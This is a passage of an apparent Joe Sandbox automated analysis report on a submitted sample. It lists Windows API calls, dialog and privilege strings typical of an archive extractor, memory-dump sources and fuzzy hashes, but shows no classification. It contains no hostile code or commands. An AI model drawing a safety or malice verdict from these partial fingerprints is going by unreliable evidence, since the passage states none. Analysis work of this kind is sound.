                                • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00D67640
                                  • Part of subcall function 00D67BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00D67C04
                                  • Part of subcall function 00D67BF5: GetLastError.KERNEL32 ref: 00D67C4A
                                  • Part of subcall function 00D67BF5: CloseHandle.KERNEL32(?), ref: 00D67C59
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                • API String ID: 3813983858-639343689
                                • Opcode ID: eecbc157927e8a3a37f9a25ba7d4fd9c3663ed0efb9b6be9d1a783ca55634de8
                                • Instruction ID: 3339d29a7f56e7b17e4a5945cbcb5fe9a03c7f638df5cc64ebf263f604f7baeb
                                • Opcode Fuzzy Hash: eecbc157927e8a3a37f9a25ba7d4fd9c3663ed0efb9b6be9d1a783ca55634de8
                                • Instruction Fuzzy Hash: 9D317071908249AFDF20EBA8DC41BEEBB69EF15358F048055F449E7292DB744A44CB71
                                APIs
                                  • Part of subcall function 00D6130B: GetDlgItem.USER32(00000000,00003021), ref: 00D6134F
                                  • Part of subcall function 00D6130B: SetWindowTextW.USER32(00000000,00D935B4), ref: 00D61365
                                • EndDialog.USER32(?,00000001), ref: 00D7A4B8
                                • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00D7A4CD
                                • SetDlgItemTextW.USER32(?,00000066,?), ref: 00D7A4E2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ItemText$DialogWindow
                                • String ID: ASKNEXTVOL
                                • API String ID: 445417207-3402441367
                                • Opcode ID: d1ff05f600aee178bcae8318bb17a1c2414fe742bf58c34e7ae3cb5eb1d2b9ec
                                • Instruction ID: 7920f50b5f7a6272c662504805992e69cfe52b42d685ad9abc653b153e30f228
                                • Opcode Fuzzy Hash: d1ff05f600aee178bcae8318bb17a1c2414fe742bf58c34e7ae3cb5eb1d2b9ec
                                • Instruction Fuzzy Hash: B311D632244302AFD7219F6C9D0DF6A3B69EB86305F184005F34DDB1A0D7A29D11D736
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: __fprintf_l_strncpy
                                • String ID: $%s$@%s
                                • API String ID: 1857242416-834177443
                                • Opcode ID: 9934f6f30900b458e4df4970a6e5f05098c80045a27677814bcfb8c284bb0818
                                • Instruction ID: c35d67a273df8df1feb2d1f70cae6971f4c089765bed1f4c7ae738a104c6ca49
                                • Opcode Fuzzy Hash: 9934f6f30900b458e4df4970a6e5f05098c80045a27677814bcfb8c284bb0818
                                • Instruction Fuzzy Hash: 47216F72940348AFDF20DEA4EC06FEE7BA9EF09300F040512FE1496191E371DA599B75
                                APIs
                                  • Part of subcall function 00D6130B: GetDlgItem.USER32(00000000,00003021), ref: 00D6134F
                                  • Part of subcall function 00D6130B: SetWindowTextW.USER32(00000000,00D935B4), ref: 00D61365
                                • EndDialog.USER32(?,00000001), ref: 00D7A9DE
                                • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00D7A9F6
                                • SetDlgItemTextW.USER32(?,00000067,?), ref: 00D7AA24
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ItemText$DialogWindow
                                • String ID: GETPASSWORD1
                                • API String ID: 445417207-3292211884
                                • Opcode ID: 883aa8bfc55ef2364cd6db62a0fece17018e7be2553af1d7c68c1b78611c3b25
                                • Instruction ID: 6add612976dcfd769fdf60df70d2ac37941b50305c0ded6ca73ef96bf6196d53
                                • Opcode Fuzzy Hash: 883aa8bfc55ef2364cd6db62a0fece17018e7be2553af1d7c68c1b78611c3b25
                                • Instruction Fuzzy Hash: 9A114833940219BBDB219A689D09FFE773CEB89310F044011FB89F2180E261DD51DB72
                                APIs
                                • _swprintf.LIBCMT ref: 00D6B51E
                                  • Part of subcall function 00D6400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D6401D
                                • _wcschr.LIBVCRUNTIME ref: 00D6B53C
                                • _wcschr.LIBVCRUNTIME ref: 00D6B54C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: _wcschr$__vswprintf_c_l_swprintf
                                • String ID: %c:\
                                • API String ID: 525462905-3142399695
                                • Opcode ID: 00608b110025e12610f955855194b2605963fc497eaf323395b71b4dc2659974
                                • Instruction ID: c7cd015a18e968747e2972075988943c5fdbdffa9d180b2024c94c7791f786c7
                                • Opcode Fuzzy Hash: 00608b110025e12610f955855194b2605963fc497eaf323395b71b4dc2659974
                                • Instruction Fuzzy Hash: 7201D263914311ABCB20ABA59C82CABB7ACEE957B07544417F986C6081FB20D984C3B1
                                APIs
                                • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00D6ABC5,00000008,?,00000000,?,00D6CB88,?,00000000), ref: 00D706F3
                                • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00D6ABC5,00000008,?,00000000,?,00D6CB88,?,00000000), ref: 00D706FD
                                • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00D6ABC5,00000008,?,00000000,?,00D6CB88,?,00000000), ref: 00D7070D
                                Strings
                                • Thread pool initialization failed., xrefs: 00D70725
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: Create$CriticalEventInitializeSectionSemaphore
                                • String ID: Thread pool initialization failed.
                                • API String ID: 3340455307-2182114853
                                • Opcode ID: 98b6fac6f54a0652bf594d0fb96127b475f47919d5a60bdea478eb88b03de314
                                • Instruction ID: b592857f458d8311fe9a424cd51cfc25125e59518591e8e0d7279fedf831e0aa
                                • Opcode Fuzzy Hash: 98b6fac6f54a0652bf594d0fb96127b475f47919d5a60bdea478eb88b03de314
                                • Instruction Fuzzy Hash: AC1170B1604708AFC3315F65D884AABFBECEB95755F10882EF1DEC2241E6716980CB70
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID:
                                • String ID: RENAMEDLG$REPLACEFILEDLG
                                • API String ID: 0-56093855
                                • Opcode ID: 54adc395e48b724537452bef394bc2d2584fd3b3c37ecbc3eea87ce19503f606
                                • Instruction ID: ab54eadc65e485df42ce906eda5c056096ffb4698984d2f2becacec77a154800
                                • Opcode Fuzzy Hash: 54adc395e48b724537452bef394bc2d2584fd3b3c37ecbc3eea87ce19503f606
                                • Instruction Fuzzy Hash: 5B017171A00346AFDB118F14ED44E663FBBEB09394B048426F809D2371EAB29C50FBB1
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: __alldvrm$_strrchr
                                • String ID:
                                • API String ID: 1036877536-0
                                • Opcode ID: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
                                • Instruction ID: 7e0c2428ef87c740546b6bf498bad81070821bb2342262e1b88cee4cb146b3d5
                                • Opcode Fuzzy Hash: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
                                • Instruction Fuzzy Hash: 59A14671A00386AFDB21EE68C8A17BEFBE5EF55310F1C41ADE4D59B281D2389942C774
                                APIs
                                • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,00D680B7,?,?,?), ref: 00D6A351
                                • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,00D680B7,?,?), ref: 00D6A395
                                • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,00D680B7,?,?,?,?,?,?,?,?), ref: 00D6A416
                                • CloseHandle.KERNEL32(?,?,00000000,?,00D680B7,?,?,?,?,?,?,?,?,?,?,?), ref: 00D6A41D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: File$Create$CloseHandleTime
                                • String ID:
                                • API String ID: 2287278272-0
                                • Opcode ID: a839a504798c24d563524e0958f8c0d858b653e89fdcafb2640ed739e008e607
                                • Instruction ID: 58d4c1bc05119cc39de60f45db3b7445b63ddf86754a29bfd007727e708debab
                                • Opcode Fuzzy Hash: a839a504798c24d563524e0958f8c0d858b653e89fdcafb2640ed739e008e607
                                • Instruction Fuzzy Hash: F341CE30288385ABD721DF68CC55BAABBE4AB85700F08091DF5D4E3291D6649A489B73
                                APIs
                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00D889AD,?,00000000,?,00000001,?,?,00000001,00D889AD,?), ref: 00D8C0E6
                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D8C16F
                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00D867E2,?), ref: 00D8C181
                                • __freea.LIBCMT ref: 00D8C18A
                                  • Part of subcall function 00D88518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D8C13D,00000000,?,00D867E2,?,00000008,?,00D889AD,?,?,?), ref: 00D8854A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                • String ID:
                                • API String ID: 2652629310-0
                                • Opcode ID: 22bf0e72a197a24a927da453e15e6131a8c587d06ff08715faf5cf10e7001aeb
                                • Instruction ID: 537b78b37c3a9d15e4924ff2f4e9c273f845a2487c8fd294aa880641152d67f7
                                • Opcode Fuzzy Hash: 22bf0e72a197a24a927da453e15e6131a8c587d06ff08715faf5cf10e7001aeb
                                • Instruction Fuzzy Hash: E931CD72A2020AEBDB25AF65DC89DAE7BA5EB44710F084129FC04D7251EB35CD51CBB0
                                APIs
                                • ___BuildCatchObject.LIBVCRUNTIME ref: 00D8251A
                                  • Part of subcall function 00D82B52: ___AdjustPointer.LIBCMT ref: 00D82B9C
                                • _UnwindNestedFrames.LIBCMT ref: 00D82531
                                • ___FrameUnwindToState.LIBVCRUNTIME ref: 00D82543
                                • CallCatchBlock.LIBVCRUNTIME ref: 00D82567
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                • String ID:
                                • API String ID: 2633735394-0
                                • Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                                • Instruction ID: 088ea336e681ba1c2279f7a3bb37e01b2e6b9c496e1a32cf631283856ed16acb
                                • Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                                • Instruction Fuzzy Hash: 49011332000108BBCF12AF65CD41EEE3BBAEF58710F058455F91866120D376E961EBB1
                                APIs
                                • GetDC.USER32(00000000), ref: 00D79DBE
                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 00D79DCD
                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00D79DDB
                                • ReleaseDC.USER32(00000000,00000000), ref: 00D79DE9
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: CapsDevice$Release
                                • String ID:
                                • API String ID: 1035833867-0
                                • Opcode ID: 758b37ed5a42f6829ba7007cef1cd63096d78c139136fc7893f2d46b3b526397
                                • Instruction ID: 906613124b255d65a0b3dcdbacfa2afb192b9d9a792c3175416ac1f34aec1a16
                                • Opcode Fuzzy Hash: 758b37ed5a42f6829ba7007cef1cd63096d78c139136fc7893f2d46b3b526397
                                • Instruction Fuzzy Hash: 28E0EC31985723A7D3201BA4AC0DFAB7B55AB0E712F050016FA06D6390EAB44405EBB5
                                APIs
                                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00D82016
                                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00D8201B
                                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00D82020
                                  • Part of subcall function 00D8310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00D8311F
                                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00D82035
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                • String ID:
                                • API String ID: 1761009282-0
                                • Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                                • Instruction ID: 10be3bb8d72352ea7f73e1b7f4dab5134ceaee52e25cf0635e7e27711cc42216
                                • Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                                • Instruction Fuzzy Hash: 5FC04834004744E41C223AF6221A6BE0B18CC62FCABA620C2ECC817107DE064B0BA337
                                APIs
                                  • Part of subcall function 00D79DF1: GetDC.USER32(00000000), ref: 00D79DF5
                                  • Part of subcall function 00D79DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00D79E00
                                  • Part of subcall function 00D79DF1: ReleaseDC.USER32(00000000,00000000), ref: 00D79E0B
                                • GetObjectW.GDI32(?,00000018,?), ref: 00D79F8D
                                  • Part of subcall function 00D7A1E5: GetDC.USER32(00000000), ref: 00D7A1EE
                                  • Part of subcall function 00D7A1E5: GetObjectW.GDI32(?,00000018,?), ref: 00D7A21D
                                  • Part of subcall function 00D7A1E5: ReleaseDC.USER32(00000000,?), ref: 00D7A2B5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ObjectRelease$CapsDevice
                                • String ID: (
                                • API String ID: 1061551593-3887548279
                                • Opcode ID: f61a0b5a1ea2de2ab9f7a9978f8638172219271a674ff4d6d99c6b22684a6bc3
                                • Instruction ID: 5446928c14c96c69127f3b6c736c4e2bc6b4a3a7a6b8e9c692a7900d91fc6298
                                • Opcode Fuzzy Hash: f61a0b5a1ea2de2ab9f7a9978f8638172219271a674ff4d6d99c6b22684a6bc3
                                • Instruction Fuzzy Hash: CD810171608315AFD714DF68D844A2ABBE9FFC8714F00891EF98AD7260DB31AD05DB62
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: _swprintf
                                • String ID: %ls$%s: %s
                                • API String ID: 589789837-2259941744
                                • Opcode ID: 46ac4c6538d805899dd7c0d68e6bd2b701b7adbd5f5c2fb5644d9e660cdd8606
                                • Instruction ID: 6e2075809308b1c545f46fd1641aeb19cab512bb7a854e6678df183597917a60
                                • Opcode Fuzzy Hash: 46ac4c6538d805899dd7c0d68e6bd2b701b7adbd5f5c2fb5644d9e660cdd8606
                                • Instruction Fuzzy Hash: E351B57568C700FEEB211AA8DD02F367E56EB04B00F24CA06F7DE648D5F692D5906A72
                                APIs
                                • __EH_prolog.LIBCMT ref: 00D67730
                                • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D678CC
                                  • Part of subcall function 00D6A444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00D6A27A,?,?,?,00D6A113,?,00000001,00000000,?,?), ref: 00D6A458
                                  • Part of subcall function 00D6A444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00D6A27A,?,?,?,00D6A113,?,00000001,00000000,?,?), ref: 00D6A489
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: File$Attributes$H_prologTime
                                • String ID: :
                                • API String ID: 1861295151-336475711
                                • Opcode ID: 64787562eadfc653f7c7528fd715a1298141ab30c3d203c37d21fc46b11d4783
                                • Instruction ID: 4d2c29a4925669468f646026119ca418b5b5d88335c80d4baa62ded68ab5d59e
                                • Opcode Fuzzy Hash: 64787562eadfc653f7c7528fd715a1298141ab30c3d203c37d21fc46b11d4783
                                • Instruction Fuzzy Hash: E3416F71804228ABEB24EB54DD55EEEB37CEF45304F00419AB649A3092EB745F88CF71
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
